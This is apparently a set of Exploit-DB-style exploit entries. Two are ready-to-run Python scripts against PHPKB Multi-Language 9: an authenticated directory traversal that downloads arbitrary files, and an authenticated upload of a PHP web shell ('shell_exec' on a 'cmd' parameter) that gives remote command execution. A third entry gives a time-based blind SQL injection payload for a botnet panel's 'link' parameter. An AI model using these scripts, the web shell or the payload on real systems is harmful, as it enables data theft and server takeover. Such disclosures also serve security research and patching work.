  23. # Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal # Google Dork: N/A # Date: 2020-03-15 # Exploit Author: Antonio Cannito # Vendor Homepage: https://www.knowledgebase-script.com/ # Software Link: https://www.knowledgebase-script.com/pricing.php # Version: Multi-Language v9 # Tested on: Windows 8.1 / PHP 7.4.3 # CVE : CVE-2020-10387 ########################## #!/usr/bin/env python3 import argparse import requests import shutil #Parsing arguments parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10387 - Authenticated Arbitrary File Download in admin/download.php in Chadha PHPKB Standard Multi-Language 9") parser.add_argument("url", type=str, help="PHPKB's base path") parser.add_argument("username", type=str, help="Superuser username") parser.add_argument("password", type=str, help="Superuser password") parser.add_argument("file", type=str, help="The file you want to download (starting from PHPKB's base path)") args = parser.parse_args() session = requests.Session() #Perform login session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text #Sending exploit code and downloading the file url = args.url + "/admin/download.php?called=ajax&act=backup-lang&file=../../" + args.file ext = url.split("/")[-1] with open(ext, 'wb') as file: shutil.copyfileobj(session.get(url, stream=True).raw, file) del session
  24. # Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution # Google Dork: N/A # Date: 2020-03-15 # Exploit Author: Antonio Cannito # Vendor Homepage: https://www.knowledgebase-script.com/ # Software Link: https://www.knowledgebase-script.com/pricing.php # Version: Multi-Language v9 # Tested on: Windows 8.1 / PHP 7.4.3 # CVE : CVE-2020-10386 #!/usr/bin/env python3 import argparse import requests from json import loads #Parsing arguments parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10386 - Remote Code Execution via .php file upload in admin/imagepaster/image-upload.php in Chadha PHPKB Standard Multi-Language 9") parser.add_argument("url", type=str, help="PHPKB's base path") parser.add_argument("username", type=str, help="Superuser/Writer/Translator/Editor username") parser.add_argument("password", type=str, help="Superuser/Writer/Translator/Editor password") parser.add_argument("command", type=str, help="The command you want to execute") args = parser.parse_args() session = requests.Session() #Perform login session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text #Sending exploit code baseurl = loads(session.post(args.url + "/admin/imagepaster/image-upload.php", files={'file': "<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>"}, data={'action': 'imageinsert_upload', 'imgMime': 'image/php', 'imgName': '../js/index.png', 'imgParent': 'null'}).text)["url"] print("Visit this page to execute the command:\n" + baseurl + "?cmd=" + args.command) print("\nIf you want to execute other commands you can re-execute the exploit or visit this webpage, followed by the command you want executed:\n" + baseurl + "?cmd=")
# Exploit Title: UADMIN Botnet 1.0 - 'link' SQL Injection
# Google Dork: n/a
# Date: 2020-03-16
# Exploit Author: n4pst3r
# Vendor Homepage: unknown
# Software Link: unknown
# Version: unknown
# Tested on: Windows 10, Kali
# CVE : n/a
################################
# Vulnerable code: download.php
$link=$_GET['link'];                          // taken straight from the query string, no esc__()
$agent=esc__($_SERVER['HTTP_USER_AGENT']);
if(isset($_GET['botid'])){ $botid=esc__($_GET['botid']); }else{ $botid='unknown'; };
# Root cause: unlike $agent and $botid, $link is never passed through the
# panel's esc__() helper, so whatever query it later reaches (not shown in
# this snippet) receives the raw user input.
################################
Attack Response & PoC:
---
Parameter: link (GET)
Type: time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: link=1' OR 7990=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nwGY
---
http://127.0.0.1/ush/gates/token.php?link=1
(Note: the snippet above is from download.php while the PoC URL targets gates/token.php; the same unescaped `link` handling is presumably shared, but this advisory does not show it.)